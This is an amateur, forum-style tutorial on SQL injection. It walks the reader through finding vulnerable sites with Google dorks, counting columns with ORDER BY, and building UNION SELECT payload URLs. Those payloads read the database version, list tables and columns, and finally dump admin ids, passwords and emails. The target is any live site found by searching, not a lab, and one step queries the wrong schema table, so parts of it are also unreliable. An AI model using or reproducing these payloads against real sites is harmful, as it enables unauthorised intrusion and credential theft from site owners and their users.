SQL injection TuT

Okay I am going to be teaching you how to SQL Inject. You can find a vurnable sites by searching on google.

Quote :

index.php?id=1

You can find more if you search google sql dork.
okay now that you have you vurnable site now put a ' after the number like this.

Quote :

http://examplesite.com/index.php?id=1'

And Errors should put up if it do not its not vurnable. Now we and going to find out how many columns are in the database put "order by 1--" until you see and error like this

Quote :

http://examplesitec.com/index.php?id=1 order by 1--

Now that you have all the columns put "UNION SELECT" than the number of columns like this.

Quote :

http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9--

Now you can see the vurnable colums you can change. So my we need the verson so if 5 is vurnable

Quote :

http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,@@version,6,7,8,9--

The version should pop up and something it will come encryption so you should get a decryter so now we are going to change @@version with " group_concat(table_name)" and change "--" with "+from+information_schema.tables+where+table_schema=database()--" the columns will have names on it like this

Quote :

http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--

Now replace group_concat(table_name) with group_concat(column_name)

Quote :

http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(column_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--

Now you have to replace group_concat(column_name) with group_concat(id,0x3a,pass,0x3a,mail) and replace +from+information_schema.tables+where+table_schema=database() with +from+x_admins

Quote :

http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(id,0x3a,pass,0x3a,mail),6,7,8,9+from+x_admins--

You had just SQL injected a site.